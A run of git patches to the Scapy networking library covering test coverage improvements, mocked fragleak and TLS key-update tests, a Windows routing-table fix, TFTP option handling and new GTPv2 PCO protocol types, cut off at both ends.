client...") t.run() -def test_tls_client(suite, version, curve=None, cookie=False, client_auth=False): +def test_tls_client(suite, version, curve=None, cookie=False, client_auth=False, key_update=False): msg = ("TestC_%s_data" % suite).encode() # Run server q_ = Queue() print("Starting server...") - th_ = threading.Thread(target=run_tls_test_server, args=(msg, q_, curve, cookie, client_auth)) + th_ = threading.Thread(target=run_tls_test_server, args=(msg, q_), + kwargs={"curve": None, "cookie": False, "client_auth": client_auth}) th_.setDaemon(True) th_.start() # Synchronise threads @@ -219,7 +244,7 @@ def test_tls_client(suite, version, curve=None, cookie=False, client_auth=False) time.sleep(1) print("Thread synchronised") # Run client - run_tls_test_client(msg, suite, version, client_auth) + run_tls_test_client(msg, suite, version, client_auth, key_update) # Wait for server print("Client running, waiting...") th_.join(5) @@ -228,7 +253,9 @@ def test_tls_client(suite, version, curve=None, cookie=False, client_auth=False) # Return values if q_.empty(): raise RuntimeError("Missing return value") - return q_.get(timeout=5) + ret = q_.get(timeout=5) + print(ret) + assert ret[0] = Testing TLS server and client with SSLv2 and SSL_CK_DES_192_EDE3_CBC_WITH_MD5 @@ -277,3 +304,8 @@ test_tls_client("1302", "0304", curve="secp256r1", cookie=True) ~ crypto_advanced test_tls_client("1305", "0304", client_auth=True) + += Testing TLS server and client with TLS 1.3 and TLS_AES_128_CCM_8_SHA256 and key update +~ crypto_advanced + +test_tls_client("1305", "0304", key_update=True) From daf64f58025af18be542b56a722893344317524d Mon Sep 17 00:00:00 2001 From: gpotter Date: Mon, 20 Apr 2020 14:48:31 +0200 Subject: [PATCH 0106/1632] Stabilize coverage --- scapy/layers/inet.py | 2 +- test/pipetool.uts | 14 ++++++++++--- test/regression.uts | 50 ++++++++++++++++++++++++++++++++++++++++---- 3 files changed, 58 insertions(+), 8 deletions(-) diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index 30d08517628..29c3c2b71f3 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -1900,7 +1900,7 @@ def fragleak(target, sport=123, dport=123, timeout=0.2, onlyasc=0, count=None): if ans.payload.payload.dst != target: continue if ans.src != target: - print("leak from", ans.src, end=' ') + print("leak from", ans.src) if not ans.haslayer(conf.padding_layer): continue leak = ans.getlayer(conf.padding_layer).load diff --git a/test/pipetool.uts b/test/pipetool.uts index b0382f736d9..bd40fb89b47 100644 --- a/test/pipetool.uts +++ b/test/pipetool.uts @@ -216,6 +216,14 @@ p.start() p.wait_and_stop() assert test_val == "hello" += Test PeriodicSource exhaustion + +s = PeriodicSource("", 1) +s.msg = [] +p = PipeEngine(s) +p.start() +p.wait_and_stop() + + Advanced ScapyPipes pipetools tests = Test SniffSource @@ -316,7 +324,7 @@ from io import BytesIO f = BytesIO() pkt = Ether()/IP()/ICMP() -with mock.patch("subprocess.Popen", return_value=Bunch(stdin=f)) as popen: +with mock.patch("scapy.scapypipes.subprocess.Popen", return_value=Bunch(stdin=f)) as popen: p = PipeEngine() src = CLIFeeder() sink = WiresharkSink() @@ -341,7 +349,7 @@ f = BytesIO() pkt = Ether()/IP()/ICMP() linktype = scapy.data.DLT_EN3MB -with mock.patch("subprocess.Popen", return_value=Bunch(stdin=f)) as popen: +with mock.patch("scapy.scapypipes.subprocess.Popen", return_value=Bunch(stdin=f)) as popen: p = PipeEngine() src = CLIFeeder() sink = WiresharkSink(linktype=linktype) @@ -371,7 +379,7 @@ assert r.linktype == DLT_EN3MB f = BytesIO() pkt = Ether()/IP()/ICMP() -with mock.patch("subprocess.Popen", return_value=Bunch(stdin=f)) as popen: +with mock.patch("scapy.scapypipes.subprocess.Popen", return_value=Bunch(stdin=f)) as popen: p = PipeEngine() src = CLIFeeder() sink = WiresharkSink(args=['-c', '1']) diff --git a/test/regression.uts b/test/regression.uts index a766020879e..f3affde09e5 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1442,6 +1442,8 @@ def _test(): assert (ans.time - req.sent_time) >= 0 assert (ans.time - req.sent_time) <= 1e-3 +retry_test(_test) + conf.L3socket = sock = Sending an ICMP message 'forever' at layer 2 and layer 3 @@ -1781,6 +1783,24 @@ retry_test(lambda: send_and_sniff(IP(dst="secdev.org")/ICMP())) retry_test(lambda: send_and_sniff(IP(dst="secdev.org")/ICMP(), flt="icmp")) retry_test(lambda: send_and_sniff(Ether()/IP(dst="secdev.org")/ICMP())) += Test SuperSocket.select +~ select + +import mock + +@mock.patch("scapy.supersocket.select") +def _test_select(select): + def f(a, b, c, d): + raise IOError + select.side_effect = f + try: + SuperSocket.select([]) + return False + except: + return True + +assert _test_select() + = Test L2ListenTcpdump socket ~ netaccess FIXME_py3 @@ -3080,6 +3100,9 @@ raw(IPv6ExtHdrHopByHop(options=[HAO(), Jumbo(), RouterAlert()])) == b';\x04\x01\ = IPv6ExtHdrHopByHop - Instantiation with RouterAlert, HAO, Jumbo raw(IPv6ExtHdrHopByHop(options=[RouterAlert(), HAO(), Jumbo()])) == b';\x03\x05\x02\x00\x00\xc9\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\xc2\x04\x00\x00\x00\x00' += IPv6ExtHdrHopByHop - Hashret +(IPv6(src="::1", dst="::1")/IPv6ExtHdrHopByHop()).hashret() == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00;' + = IPv6ExtHdrHopByHop - Basic Dissection a=IPv6ExtHdrHopByHop(b';\x00\x01\x04\x00\x00\x00\x00') a.nh == 59 and a.len == 0 and len(a.options) == 1 and isinstance(a.options[0], PadN) and a.options[0].otype == 1 and a.options[0].optlen == 4 and a.options[0].optdata == b'\x00'*4 @@ -7051,6 +7074,9 @@ assert(all(UDP in p for p in l)) l = sniff(offline=IP()/UDP(sport=(10000, 10001)), filter="tcp") assert len(l) == 0 += Check offline sniff with lfilter +assert len(sniff(offline=[IP()/UDP(), IP()/TCP()], lfilter=lambda x: TCP in x)) == 1 + = Check offline sniff() without a tcpdump binary ~ tcpdump import mock @@ -13009,8 +13035,24 @@ dname = get_temp_dir() assert os.path.isdir(dname) = test fragleak functions -~ netaccess linux +~ netaccess linux fragleak -fragleak("8.8.8.8", count=1) -fragleak2("8.8.8.8", count=1) -assert True +import mock + +@mock.patch("scapy.layers.inet.conf.L3socket") +@mock.patch("scapy.layers.inet.select.select") +@mock.patch("scapy.layers.inet.sr1") +def _test_fragleak(func, sr1, select, L3socket): + packets = [IP(src="4.4.4.4")/ICMP()/IPerror(dst="8.8.8.8")/conf.padding_layer(load=b"greatdata")] + iterator = iter(packets) + ne = lambda *args, **kwargs: next(iterator) + L3socket.side_effect = lambda: Bunch(recv=ne, send=lambda x: None) + sr1.side_effect = ne + select.side_effect = lambda a, b, c, d: a+b+c + with ContextManagerCaptureOutput() as cmco: + func("8.8.8.8", count=1) + out = cmco.get_output() + return "greatdata" in out + +assert _test_fragleak(fragleak) +assert _test_fragleak(fragleak2) From 87f3828894a1cdad7612b86646b4e8fa8dec5bdc Mon Sep 17 00:00:00 2001 From: akorb Date: Mon, 20 Apr 2020 12:49:46 +0200 Subject: [PATCH 0107/1632] #2549 Improve consistency for plain_str --- scapy/compat.py | 3 ++- test/regression.uts | 11 +++++++++-- 2 files changed, 11 insertions(+), 3 deletions(-) diff --git a/scapy/compat.py b/scapy/compat.py index f1c54a8c0ce..421f6779c04 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -13,6 +13,7 @@ import binascii import gzip import struct +import sys import scapy.modules.six as six @@ -59,7 +60,7 @@ def bytes_encode(x): return x.encode() return bytes(x) - if six.PY34: + if sys.version_info[0:2] <= (3, 4): def plain_str(x): """Convert basic byte objects to str""" if isinstance(x, bytes): diff --git a/test/regression.uts b/test/regression.uts index f3affde09e5..4854c4dbd81 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -254,11 +254,18 @@ assert (ARP(ptype=0, pdst="hello. this isn't a valid IP")).route()[0] is None = plain_str test +data = b"\xffsweet\xef celestia\xab" if not six.PY2: # Only Python 3 has to deal with Str/Bytes conversion, # as we don't use Python 2's unicode - data = b"\xffsweet\xef celestia\xab" - assert plain_str(data) == "sweet celestia" + if sys.version_info[0:2] <= (3, 4): + # Python3.4 can only ignore unknown special characters + assert plain_str(data) == "sweet celestia" + else: + # Python >3.4 can replace them with a backslash representation + assert plain_str(data) == "\\xffsweet\\xef celestia\\xab" +else: + assert plain_str(data) == "\xffsweet\xef celestia\xab" ############ ############ From 7c9578929cd37216a213b76a2e5a8cd6f3399e07 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Tue, 21 Apr 2020 16:19:17 +0200 Subject: [PATCH 0108/1632] Try to recover from incompatible l3 types --- scapy/arch/linux.py | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/scapy/arch/linux.py b/scapy/arch/linux.py index 4abe14e3967..fd979f0b9a5 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux.py @@ -559,10 +559,15 @@ def send(self, x): self.outs.bind(sdto) sn = self.outs.getsockname() ll = lambda x: x - if type(x) in conf.l3types: - sdto = (iff, conf.l3types[type(x)]) + type_x = type(x) + if type_x in conf.l3types: + sdto = (iff, conf.l3types[type_x]) if sn[3] in conf.l2types: ll = lambda x: conf.l2types[sn[3]]() / x + if self.lvl == 3 and type_x != self.LL: + warning("Incompatible L3 types detected using %s instead of %s !", + type_x, self.LL) + self.LL = type_x sx = raw(ll(x)) x.sent_time = time.time() try: From 485c065944c59e6d1f8cec95c4c55ca251dfda6d Mon Sep 17 00:00:00 2001 From: Gabriel Date: Wed, 22 Apr 2020 10:32:35 +0200 Subject: [PATCH 0109/1632] Forgotten debug --- scapy/arch/windows/__init__.py | 1 - 1 file changed, 1 deletion(-) diff --git a/scapy/arch/windows/__init__.py b/scapy/arch/windows/__init__.py index 7ba6e5a0ddf..ff7e22f468d 100755 --- a/scapy/arch/windows/__init__.py +++ b/scapy/arch/windows/__init__.py @@ -905,7 +905,6 @@ def read_routes(): else: routes = _read_routes_c(ipv6=False) except Exception as e: - raise warning("Error building scapy IPv4 routing table : %s", e) else: if not routes: From c7008d68b17f0f216ff3ea2c04184607ad1a8073 Mon Sep 17 00:00:00 2001 From: Lancer Date: Thu, 23 Apr 2020 05:43:37 +0800 Subject: [PATCH 0110/1632] fix read_route bug for windows (#2605) * fix read_route bug for windows Bug description 1. set an ip address 10.0.0.1/24 on windows net adapter. 2. read route from scapy(read_route()), results like dst:10.0.0.0 mask: 255.0.0.0 blabla... 3. read route from windows(route print), results like dst:10.0.0.0 mask: 255.255.255.0 blabla... * fix flake8 errors fix flake8 errors and merge master changes --- scapy/arch/windows/__init__.py | 13 +++++-------- 1 file changed, 5 insertions(+), 8 deletions(-) diff --git a/scapy/arch/windows/__init__.py b/scapy/arch/windows/__init__.py index ff7e22f468d..bd15abbcf84 100755 --- a/scapy/arch/windows/__init__.py +++ b/scapy/arch/windows/__init__.py @@ -857,26 +857,23 @@ def _read_routes_c(ipv6=False): sock_addr_name = 'Ipv6' if ipv6 else 'Ipv4' sin_addr_name = 'sin6_addr' if ipv6 else 'sin_addr' metric_name = 'ipv6_metric' if ipv6 else 'ipv4_metric' - ip_len = 16 if ipv6 else 4 if ipv6: lifaddr = in6_getifaddr() routes = [] - def _extract_ip_netmask(obj): + def _extract_ip(obj): ip = obj[sock_addr_name][sin_addr_name] ip = bytes(bytearray(ip['byte'])) - # Extract netmask - netmask = (ip_len - (len(ip) - len(ip.rstrip(b"\x00")))) * 8 # Build IP ip = inet_ntop(af, ip) - return ip, netmask + return ip for route in GetIpForwardTable2(af): # Extract data ifIndex = route['InterfaceIndex'] - _dest = route['DestinationPrefix'] - dest, netmask = _extract_ip_netmask(_dest['Prefix']) - nexthop, _ = _extract_ip_netmask(route['NextHop']) + dest = _extract_ip(route['DestinationPrefix']['Prefix']) + netmask = route['DestinationPrefix']['PrefixLength'] + nexthop = _extract_ip(route['NextHop']) metric = route['Metric'] # Build route try: From b265512ca303ae1b904e54bc71715f27575c1d08 Mon Sep 17 00:00:00 2001 From: gpotter Date: Fri, 24 Apr 2020 19:03:27 +0200 Subject: [PATCH 0111/1632] Fix whois tests --- test/regression.uts | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/test/regression.uts b/test/regression.uts index 65406ef15fc..4a43ad43927 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1532,7 +1532,7 @@ def _test(): retry_test(_test) = AS resolvers -~ netaccess IP +~ netaccess IP as_resolvers * This test retries on failure because it often fails def _test(): @@ -1542,10 +1542,10 @@ def _test(): retry_test(_test) -def _test(): - ret = AS_resolver_riswhois().resolve("8.8.8.8") - assert (len(ret) == 1) - assert all(x[1] == "AS15169" for x in ret) +riswhois_data = b"route: 8.8.8.0/24\ndescr: Google\norigin: AS15169\nnotify: radb-contact@google.com\nmnt-by: MAINT-AS15169\nchanged: radb-contact@google.com 20150728\nsource: RADB\n\nroute: 8.0.0.0/9\ndescr: Proxy-registered route object\norigin: AS3356\nremarks: auto-generated route object\nremarks: this next line gives the robot something to recognize\nremarks: L'enfer, c'est les autres\nremarks: \nremarks: This route object is for a Level 3 customer route\nremarks: which is being exported under this origin AS.\nremarks: \nremarks: This route object was created because no existing\nremarks: route object with the same origin was found, and\nremarks: since some Level 3 peers filter based on these objects\nremarks: this route may be rejected if this object is not created.\nremarks: \nremarks: Please contact routing@Level3.net if you have any\nremarks: questions regarding this object.\nmnt-by: LEVEL3-MNT\nchanged: roy@Level3.net 20060203\nsource: LEVEL3\n\n\n" + +ret = AS_resolver_riswhois()._parse_whois(riswhois_data) +assert ret == ('AS15169', 'Google') retry_test(_test) From eff27ca00aca676b934709153f0e57ffc9302576 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sat, 25 Apr 2020 20:18:25 +0200 Subject: [PATCH 0112/1632] Name the checkout steps --- .github/workflows/unittests.yml | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index aecf410ce31..71cd7e04dee 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -7,7 +7,8 @@ jobs: name: Code health check runs-on: ubuntu-latest steps: - - uses: actions/checkout@v2 + - name: Checkout Scapy + uses: actions/checkout@v2 - name: Setup Python uses: actions/setup-python@v1 with: @@ -24,7 +25,8 @@ jobs: name: Build doc runs-on: ubuntu-latest steps: - - uses: actions/checkout@v2 + - name: Checkout Scapy + uses: actions/checkout@v2 - name: Setup Python uses: actions/setup-python@v1 with: @@ -37,7 +39,8 @@ jobs: name: Type hints check runs-on: ubuntu-latest steps: - - uses: actions/checkout@v2 + - name: Checkout Scapy + uses: actions/checkout@v2 - name: Setup Python uses: actions/setup-python@v1 with: @@ -55,7 +58,8 @@ jobs: matrix: python: [2.7, pypy2, pypy3, 3.5, 3.6, 3.7, 3.8] steps: - - uses: actions/checkout@v2 + - name: Checkout Scapy + uses: actions/checkout@v2 - name: Setup Python uses: actions/setup-python@v1 with: From 27555fb087fd14a4062f85d36da7bd96bd2b7fc5 Mon Sep 17 00:00:00 2001 From: gpotter Date: Sun, 26 Apr 2020 10:53:50 +0200 Subject: [PATCH 0113/1632] Coverage improvement: TFTP --- scapy/automaton.py | 5 --- scapy/layers/tftp.py | 4 +-- test/tftp.uts | 73 +++++++++++++++++++++++++++++++++++++++++--- 3 files changed, 71 insertions(+), 11 deletions(-) diff --git a/scapy/automaton.py b/scapy/automaton.py index 1ff1705477e..f1ed3ee87ea 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -859,11 +859,6 @@ def _do_control(self, ready, *args, **kargs): self.cmdout.send(m) self.debug(3, "Stopping control thread (tid=%i)" % self.threadid) self.threadid = None - # Close sockets - if self.listen_sock: - self.listen_sock.close() - if self.send_sock: - self.send_sock.close() def _do_iter(self): while True: diff --git a/scapy/layers/tftp.py b/scapy/layers/tftp.py index 97d841b4b31..c5e1ad38003 100644 --- a/scapy/layers/tftp.py +++ b/scapy/layers/tftp.py @@ -340,7 +340,7 @@ def ack_WRQ(self, pkt): self.last_packet = self.l3 / TFTP_ACK(block=0) self.send(self.last_packet) else: - opt = [x for x in options.options if x.oname.upper() == "BLKSIZE"] + opt = [x for x in options.options if x.oname.upper() == b"BLKSIZE"] if opt: self.blksize = int(opt[0].value) self.debug(2, "Negotiated new blksize at %i" % self.blksize) @@ -434,7 +434,7 @@ def RECEIVED_RRQ(self, pkt): self.data = self.joker if options: - opt = [x for x in options.options if x.oname.upper() == "BLKSIZE"] + opt = [x for x in options.options if x.oname.upper() == b"BLKSIZE"] if opt: self.blksize = int(opt[0].value) self.debug(2, "Negotiated new blksize at %i" % self.blksize) diff --git a/test/tftp.uts b/test/tftp.uts index 93ddfcbc70e..7aa4fc6e1cb 100644 --- a/test/tftp.uts +++ b/test/tftp.uts @@ -2,7 +2,21 @@ # More information at http://www.secdev.org/projects/UTscapy/ -+ Automatons ++ TFTP coverage tests + += Test answers + +assert TFTP_DATA(block=1).answers(TFTP_RRQ()) +assert not TFTP_WRQ().answers(TFTP_RRQ()) +assert not TFTP_RRQ().answers(TFTP_WRQ()) +assert TFTP_ACK(block=1).answers(TFTP_DATA(block=1)) +assert not TFTP_ACK(block=0).answers(TFTP_DATA(block=1)) +assert TFTP_ACK(block=0).answers(TFTP_RRQ()) +assert not TFTP_ACK().answers(TFTP_ACK()) +assert TFTP_ERROR().answers(TFTP_DATA()) and TFTP_ERROR().answers(TFTP_ACK()) +assert TFTP_OACK().answers(TFTP_WRQ()) + ++ TFTP Automatons ~ linux = Utilities @@ -44,10 +58,29 @@ tftp_read = TFTP_read("file.txt", "1.2.3.4", sport=0x2807, ll=MockReadSocket, recvsock=MockReadSocket) -tftp_read.run() +res = tftp_read.run() scapy.automaton.select_objects = legacy_select_objects -assert tftp_read.res == (b"P" * 512 + b"<3") +assert res == (b"P" * 512 + b"<3") + += TFTP_read() automaton error +~ linux + +class MockReadSocket(MockTFTPSocket): + packets = [IP(src="1.2.3.4") / UDP(dport=0x2807) / TFTP_ERROR(errorcode=2, errormsg="Fatal error")] + +patch_select_objects(MockReadSocket) +tftp_read = TFTP_read("file.txt", "1.2.3.4", sport=0x2807, + ll=MockReadSocket, + recvsock=MockReadSocket) + +try: + tftp_read.run() + assert False +except Automaton.ErrorState as e: + assert str(e) == "Reached ERROR: [\"ERROR Access violation: 'Fatal error'\"]" + +scapy.automaton.select_objects = legacy_select_objects = TFTP_write() automaton ~ linux @@ -71,6 +104,24 @@ tftp_write.run() scapy.automaton.select_objects = legacy_select_objects assert data_received == (b"P" * 767 + b"Scapy <3") += TFTP_write() automaton error +~ linux + +class MockWriteSocket(MockTFTPSocket): + packets = [IP(src="1.2.3.4") / UDP(dport=0x2807) / TFTP_ERROR(errorcode=2, errormsg="Fatal error")] + +tftp_write = TFTP_write("file.txt", "P" * 767 + "Scapy <3", "1.2.3.4", sport=0x2807, + ll=MockWriteSocket, + recvsock=MockWriteSocket) + +patch_select_objects(MockWriteSocket) +try: + tftp_write.run() + assert False +except Automaton.ErrorState as e: + assert str(e) == "Reached ERROR: [\"ERROR Access violation: 'Fatal error'\"]" + +scapy.automaton.select_objects = legacy_select_objects = TFTP_WRQ_server() automaton ~ linux @@ -87,6 +138,20 @@ patch_select_objects(MockWRQSocket) assert tftp_wrq.run() == (b"scapy.txt", (b"P" * 512 + b"<3")) scapy.automaton.select_objects = legacy_select_objects += TFTP_WRQ_server() automaton with options +~ linux + +class MockWRQSocket(MockTFTPSocket): + packets = [IP(dst="1.2.3.4") / UDP(dport=0x2807) / TFTP() / TFTP_WRQ(filename="scapy.txt") / TFTP_Options(options=[TFTP_Option(oname="blksize", value="100")]), + IP(dst="1.2.3.4") / UDP(dport=0x2807) / TFTP() / TFTP_DATA(block=1) / ("P" * 100), + IP(dst="1.2.3.4") / UDP(dport=0x2807) / TFTP() / TFTP_DATA(block=2) / "<3"] + +tftp_wrq = TFTP_WRQ_server(ip="1.2.3.4", sport=0x2807, + ll=MockWRQSocket, + recvsock=MockWRQSocket) +patch_select_objects(MockWRQSocket) +assert tftp_wrq.run() == (b"scapy.txt", (b"P" * 100 + b"<3")) +scapy.automaton.select_objects = legacy_select_objects = TFTP_RRQ_server() automaton ~ linux @@ -101,7 +166,7 @@ fdesc.close() received_data = "" class MockRRQSocket(MockTFTPSocket): - packets = [IP(dst="1.2.3.4") / UDP(dport=0x2807) / TFTP() / TFTP_RRQ(filename="scapy.txt") / TFTP_Options(), + packets = [IP(dst="1.2.3.4") / UDP(dport=0x2807) / TFTP() / TFTP_RRQ(filename="scapy.txt") / TFTP_Options(options=[TFTP_Option(oname="blksize", value="100")]), IP(dst="1.2.3.4") / UDP(dport=0x2807) / TFTP() / TFTP_RRQ(filename=filename[5:]) / TFTP_Options(), IP(dst="1.2.3.4") / UDP(dport=0x2807) / TFTP() / TFTP_ACK(block=1), IP(dst="1.2.3.4") / UDP(dport=0x2807) / TFTP() / TFTP_ACK(block=2) ] From 1d5b7af3b71793f4deb9c41d8372d737595dfe0d Mon Sep 17 00:00:00 2001 From: gpotter Date: Sun, 26 Apr 2020 11:07:38 +0200 Subject: [PATCH 0114/1632] Coverage improvement: sendrecv --- scapy/sendrecv.py | 8 -------- 1 file changed, 8 deletions(-) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index fd2f11da238..c118be86edf 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -539,8 +539,6 @@ def sr1(x, promisc=None, filter=None, iface=None, nofilter=0, *args, **kargs): s.close() if len(ans) > 0: return ans[0][1] - else: - return None @conf.commands.register @@ -566,8 +564,6 @@ def srp1(*args, **kargs): ans, _ = srp(*args, **kargs) if len(ans) > 0: return ans[0][1] - else: - return None # Append doc @@ -706,8 +702,6 @@ def sr1flood(x, promisc=None, filter=None, iface=None, nofilter=0, *args, **karg s.close() if len(ans) > 0: return ans[0][1] - else: - return None @conf.commands.register @@ -743,8 +737,6 @@ def srp1flood(x, promisc=None, filter=None, iface=None, nofilter=0, *args, **kar s.close() if len(ans) > 0: return ans[0][1] - else: - return None # SNIFF METHODS From 15d39a77ff65c3c3cdabced76a619a7e72ec78c2 Mon Sep 17 00:00:00 2001 From: gpotter Date: Sun, 26 Apr 2020 11:15:23 +0200 Subject: [PATCH 0115/1632] Coverage improvement: supersocket --- scapy/supersocket.py | 2 +- test/regression.uts | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/supersocket.py b/scapy/supersocket.py index 5906315c2d0..75ca0106576 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -198,7 +198,7 @@ def select(sockets, remain=conf.recv_poll_rate): inp, _, _ = select(sockets, [], [], remain) except (IOError, select_error) as exc: # select.error has no .errno attribute - if exc.args[0] != errno.EINTR: + if not exc.args or exc.args[0] != errno.EINTR: raise return inp, None diff --git a/test/regression.uts b/test/regression.uts index 4a43ad43927..6e616625f7f 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1798,7 +1798,7 @@ import mock @mock.patch("scapy.supersocket.select") def _test_select(select): def f(a, b, c, d): - raise IOError + raise IOError(0) select.side_effect = f try: SuperSocket.select([]) From 17397447dab8f320a82b5855f0f856724945af86 Mon Sep 17 00:00:00 2001 From: gpotter Date: Sun, 26 Apr 2020 11:23:10 +0200 Subject: [PATCH 0116/1632] Fix DeprecationWarning --- test/sendsniff.uts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/test/sendsniff.uts b/test/sendsniff.uts index 985eddc42d0..633242717f5 100644 --- a/test/sendsniff.uts +++ b/test/sendsniff.uts @@ -301,7 +301,7 @@ assert len(unans) == 1 t_answer.join(15) -if t_answer.isAlive(): +if t_answer.is_alive(): raise Exception("Test timed out") if conf.use_pypy: From d9fbc7240bc0ad3277a84beb3e017efb590f49b1 Mon Sep 17 00:00:00 2001 From: Gabriel Date: Wed, 29 Apr 2020 14:50:37 +0200 Subject: [PATCH 0117/1632] Update animation link in README --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 20db19ce3f4..6f725b122fe 100644 --- a/README.md +++ b/README.md @@ -42,7 +42,7 @@ For further details, please head over to [Getting started with Scapy](https://sc ### Shell demo -![Scapy install demo](https://secdev.github.io/img/animation-scapy-install.svg) +![Scapy install demo](https://secdev.github.io/files/doc/animation-scapy-install.svg) Scapy can easily be used as an interactive shell to interact with the network. The following example shows how to send an ICMP Echo Request message to From 24837b3e9cc64430eacf46849567f973640eb663 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Wed, 29 Apr 2020 15:41:58 +0200 Subject: [PATCH 0118/1632] Advanced cryptogaphy comment --- scapy/config.py | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/scapy/config.py b/scapy/config.py index d76d5d53a50..6ecc82ac060 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -378,8 +378,8 @@ def _version_checker(module, minver): def isCryptographyValid(): """ - Check if the cryptography library is present, and if it is recent enough - for most usages in scapy (v1.7 or later). + Check if the cryptography module >= 1.7 is present. This is the minimum + version for most usages in Scapy. """ try: import cryptography @@ -390,8 +390,12 @@ def isCryptographyValid(): def isCryptographyAdvanced(): """ - Check if the cryptography library is present, and if it supports X25519, - ChaCha20Poly1305 and such (v2.0 or later). + Check if the cryptography module is present, and if it supports X25519, + ChaCha20Poly1305 and such. + + Notes: + - cryptography >= 2.0 is required + - OpenSSL >= 1.1.0 is required """ try: from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey # noqa: E501 From 28a5bb7c22b1a87f87f11a43ae7468d5f06079e0 Mon Sep 17 00:00:00 2001 From: akorb Date: Fri, 1 May 2020 13:14:53 +0200 Subject: [PATCH 0119/1632] Rename Automotive section in documentation --- doc/scapy/layers/automotive.rst | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/doc/scapy/layers/automotive.rst b/doc/scapy/layers/automotive.rst index 2a880482bad..46deb741e6d 100644 --- a/doc/scapy/layers/automotive.rst +++ b/doc/scapy/layers/automotive.rst @@ -1,6 +1,6 @@ -******************* -Automotive Security -******************* +********** +Automotive +********** Overview ======== From 13613c753248c8253a03f25a043a80e0b952a1b2 Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Fri, 1 May 2020 16:21:08 -0400 Subject: [PATCH 0120/1632] Add new fields for IE_PCO --- scapy/contrib/gtp_v2.py | 117 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 117 insertions(+) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index de012783e10..3d148edb45a 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -222,6 +222,7 @@ 145: "UCI", 161: "Max MBR/APN-AMBR (MMBR)", 172: "RAN/NAS Cause", + 197: "Extended Protocol Configuration Options", 202: "UP Function Selection Indication Flags", 255: "Private Extension", } @@ -926,12 +927,22 @@ class PCO_Secondary_NBNS(PCO_Option): PCO_PROTOCOL_TYPES = { 0x0001: 'P-CSCF IPv6 Address Request', + 0x0002: 'IM CN Subsystem Signaling Flag', 0x0003: 'DNS Server IPv6 Address Request', 0x0005: 'MS Support of Network Requested Bearer Control indicator', 0x000a: 'IP Allocation via NAS', 0x000d: 'DNS Server IPv4 Address Request', 0x000c: 'P-CSCF IPv4 Address Request', 0x0010: 'IPv4 Link MTU Request', + 0x0012: 'P-CSCF Re-selection Support', + 0x001a: 'PDU session ID', + 0x0022: '5GSM Cause Value', + 0x0023: 'QoS Rules With Support Indicator', + 0x0024: 'QoS Flow Descriptions With Support Indicator', + 0x001b: 'S-NSSAI', + 0x001c: 'QoS Rules', + 0x001d: 'Session-AMBR', + 0x001f: 'QoS Flow Descriptions', 0x8021: 'IPCP', 0xc023: 'Password Authentication Protocol', 0xc223: 'Challenge Handshake Authentication Protocol', @@ -967,6 +978,14 @@ class PCO_P_CSCF_IPv6_Address_Request(PCO_Option): lambda pkt: pkt.length)] +class PCO_IM_CN_Subsystem_Signaling_Flag(PCO_Option): + name = "PCO IM CN Subsystem Signaling Flag" + fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), + ByteField("length", 0), + PacketListField("Options", None, PCO_option_dispatcher, + length_from=len_options)] + + class PCO_DNS_Server_IPv6(PCO_Option): name = "PCO DNS Server IPv6 Address Request" fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), @@ -1027,6 +1046,78 @@ class PCO_IPv4_Link_MTU_Request(PCO_Option): lambda pkt: pkt.length)] +class PCO_P_CSCF_Re_selection_Support(PCO_Option): + name = "PCO P-CSCF Re-selection Support" + fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), + ByteField("length", 0), + PacketListField("Options", None, PCO_option_dispatcher, + length_from=len_options)] + + +class PCO_PDU_Session_Id(PCO_Option): + name = "PCO PDU session ID" + fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), + ByteField("length", 0), + PacketListField("Options", None, PCO_option_dispatcher, + length_from=len_options)] + + +class PCO_5GSM_Cause_Value(PCO_Option): + name = "PCO 5GSM Cause Value" + fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), + ByteField("length", 0), + PacketListField("Options", None, PCO_option_dispatcher, + length_from=len_options)] + + +class PCO_QoS_Rules_With_Support_Indicator(PCO_Option): + name = "PCO QoS Rules With Support Indicator" + fields_desc = [ShortEnumField("type", None, PCO_PROTOCOL_TYPES), + ByteField("length", 0), + PacketListField("Options", None, PCO_option_dispatcher, + length_from=len_options)] + + +class 